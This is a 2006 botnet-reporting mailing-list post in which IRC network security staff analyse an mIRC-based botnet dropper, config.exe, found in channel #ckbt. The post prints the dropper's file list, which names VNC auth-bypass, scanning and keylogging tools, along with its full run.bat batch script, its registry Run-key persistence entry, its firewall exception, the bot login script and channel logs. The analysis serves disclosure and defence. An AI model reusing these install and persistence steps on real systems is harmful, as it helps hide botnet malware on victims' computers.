To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
See attached message re: Israeli drone herders.
-- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome.
--- Begin Message ---Config.exe is a rarsfx package. Use unrar to unpack. When executed, the following configuration is used: Path=C:\Windows\Config Setup=run.bat Silent=1 Overwrite=1 Filelist: Name Size Packed Ratio Date Time Attr CRC Meth Ver ------------------------------------------------------------------------------- netsh.exe 86016 22533 26% 04-08-04 01:56 .....A 946E79D6 m3f 2.9 psinfo.exe 131072 40244 30% 23-06-06 17:30 .....A 381466FB m3f 2.9 pskill.exe 77824 23239 29% 04-04-04 11:04 .....A 3E9148D1 m3f 2.9 reg.reg 183 154 84% 28-07-06 15:18 .....A D1333829 m3f 2.9 remote.ini 947 142 14% 27-08-06 00:35 .....A 89F72B10 m3f 2.9 run32.exe 6656 2251 33% 05-02-04 21:51 .....A F46B392A m3f 2.9 run.bat 143 124 86% 29-07-06 16:41 .....A E12395AF m3f 2.9 script1.ini 2191 828 37% 25-08-06 04:19 .....A 4EC8B057 m3f 2.9 script2.ini 943 462 48% 25-08-06 04:17 .....A CC54C0E6 m3f 2.9 script3.ini 360 236 65% 05-08-06 16:51 .....A 6DBC0DCA m3f 2.9 script.ini 3487 858 24% 27-08-06 00:36 .....A 04018E3D m3f 2.9 speed.bat 36 36 100% 30-07-06 18:33 .....A 2AAFE8C4 m0f 2.9 tlist.exe 40720 17111 42% 27-02-06 18:13 .....A FD77615D m3f 2.9 udix.exe 899132 409238 45% 28-07-06 14:20 .....A D6B1568E m3f 2.9 vnc3.bat 76 76 100% 26-07-06 20:57 .....A 46CB49AF m0f 2.9 vnc.exe 32768 5882 17% 28-07-06 14:50 .....A D9682F6D m3f 2.9 VNC_bypauth.txt 1461 200 13% 26-08-06 04:18 .....A 9AD53290 m3f 2.9 vncscan.exe 32768 5882 17% 28-07-06 14:50 .....A D9682F6D m3f 2.9 wget.exe 308736 302075 97% 16-01-04 02:11 .....A B7B4CEA5 m3f 2.9 whoami.exe 48128 20266 42% 23-06-06 17:30 .....A 4CE7D5C7 m3f 2.9 winlogon.exe 1753088 622664 35% 04-04-04 11:01 .....A 23BD4AB8 m3f 2.9 winvnc.bat 105 79 75% 02-08-06 20:34 .....A BF5DC663 m3f 2.9 info.txt 2549 562 22% 27-02-06 07:42 .....A FAD4DD4B m3f 2.9 VNC_bypauth.txt 1957 261 13% 27-02-06 07:49 .....A 68070F61 m3f 2.9 aliases.ini 307 208 67% 05-02-04 21:51 .....A 16960B06 m3f 2.9 control.ini 54 54 100% 27-08-06 00:35 .....A 729BFE08 m0f 2.9 dfind.exe 65536 11722 17% 05-07-06 16:51 .....A D204A508 m3f 2.9 Fport.exe 114688 51119 44% 23-06-06 17:29 .....A B100493A m3f 2.9 info.txt 3309 702 21% 27-08-06 00:16 .....A 3FBF2125 m3f 2.9 instsrv.exe 37888 15375 40% 27-02-06 18:13 .....A F0092F54 m3f 2.9 kl32.exe 77824 23238 29% 04-04-04 11:04 .....A 3E9148D1 m3f 2.9 mirc.ini 3344 1499 44% 27-08-06 00:35 .....A A7446C1C m3f 2.9 mprapi.dll 87040 39050 44% 04-08-04 00:56 .....A D1E492AB m3f 2.9 net.exe 42768 19840 46% 27-02-06 18:13 .....A BDAD7FD4 m3f 2.9 download 0 0 0% 25-08-06 04:15 .D.... 00000000 m0 2.0 logs 0 0 0% 25-08-06 04:15 .D.... 00000000 m0 2.0 sounds 0 0 0% 26-08-06 14:15 .D.... 00000000 m0 2.0 ------------------------------------------------------------------------------- 37 3864104 1638210 42% Contents of run.bat: @echo off netsh.exe firewall add allowedprogram C:\Windows\Config\winlogon.exe Winlogon ENABLE regedit.exe /s reg.reg run32.exe winlogon.exe run.bat will try to add a firewall exception for winlogon.exe, which is simply a renamed mIRC executable. It will then try to install the following into the registry: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "winlogon"="C:\\Windows\\Config\\run32.exe C:\\Windows\\Config\\winlogon.exe" Bot authentication: n104=on *:text:!login *:*:{ n105= if (($2 == [EMAIL PROTECTED]) && ($nick isop $chan)) { n106= auser master $nick n107= msg $Target Password Accepted n108= } n109=} Existing bot masters: n0=master:kan n1=master:Cool-Man Other interesting information: n0=%bu 4 n1=%rrr 180 n2=%lalaosd on n3=%vic 80.178.20.3 n4=%threads 100 Note the Israeli IP - it's an adsl line on the same ISP that kan appeared from. On Tue, Aug 29, 2006 at 01:45:54PM -0400, pak000 babbled thus: > > Not sure what this one is, i've not seen it before, the channel is #ckbt > and registered under the nick "kan" > > Channel topic is "http://www.sendspace.com/file/rfim2x !login [EMAIL > PROTECTED]" > > The link as another member of networks staff informs me is a html page > containing some javascript for phishing, perhaps paypal. Also a link to a > file called config.exe about 1MB in size > > All bots respond to a versoin with : mIRC v6.03 Khaled Mardam-Bey > > All respond to finger with: [1246] [hguxomj FINGER reply]: asdg4r4f > ([EMAIL PROTECTED]) > > /who of channel: > #ckbt France-gax H [EMAIL PROTECTED] > :1 asdg4r4f > #ckbt DAmeShot H~ [EMAIL PROTECTED] :2 DAmeShot > #ckbt hguxomj H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt gfmilyo H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt ikqdici H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt France-zff H [EMAIL PROTECTED] :1 > asdg4r4f > #ckbt fekufbc H [EMAIL PROTECTED] :1 > asdg4r4f > #ckbt mfkuxgq H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt kopdzmk H [EMAIL PROTECTED] > :2 asdg4r4f > #ckbt cjcuzaj H [EMAIL PROTECTED] :1 > asdg4r4f > #ckbt israel-ybn H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt xzencbj H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt txesyuy H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt txgljoj H [EMAIL PROTECTED] :1 asdg4r4f > #ckbt End of /WHO list. > > [1235] -ChanServ- Information for channel #ckbt: > [1235] -ChanServ- Founder: kan > [1235] -ChanServ- Description: TOB > [1235] -ChanServ- Registered: Aug 26 23:38:54 2006 > [1235] -ChanServ- Last used: Aug 29 11:31:09 2006 > [1235] -ChanServ- Last topic: http://www.sendspace.com/file/rfim2x > !login [EMAIL PROTECTED] > [1235] -ChanServ- Topic set by: kan > [1235] -ChanServ- Options: Topic Retention, Secure > [1235] -ChanServ- Mode lock: +nt > [1236] -NickServ- dameshot is DAmeShot > [1236] -NickServ- Last seen address: > [EMAIL PROTECTED] > [1236] -NickServ- Last seen time: Aug 28 02:33:51 2006 > [1236] -NickServ- Time registered: Aug 27 22:57:42 2006 > [1236] -NickServ- Last quit message: Ping timeout > [1236] -NickServ- E-mail address: [EMAIL PROTECTED] > [1236] -NickServ- Options: Security > [1236] -NickServ- kan is Kan > [1236] -NickServ- Is online from: [EMAIL PROTECTED] > [1236] -NickServ- Time registered: Aug 26 23:33:57 2006 > [1236] -NickServ- Last quit message: Quit: > [1236] -NickServ- E-mail address: [EMAIL PROTECTED] > [1236] -NickServ- Options: Security > > > > pak000 > services administrator > irc.zirc.org -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature_______________________________________________ irc-security mailing list [EMAIL PROTECTED] http://lists.irc-unity.org/mailman/listinfo/irc-security
--- End Message ---
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
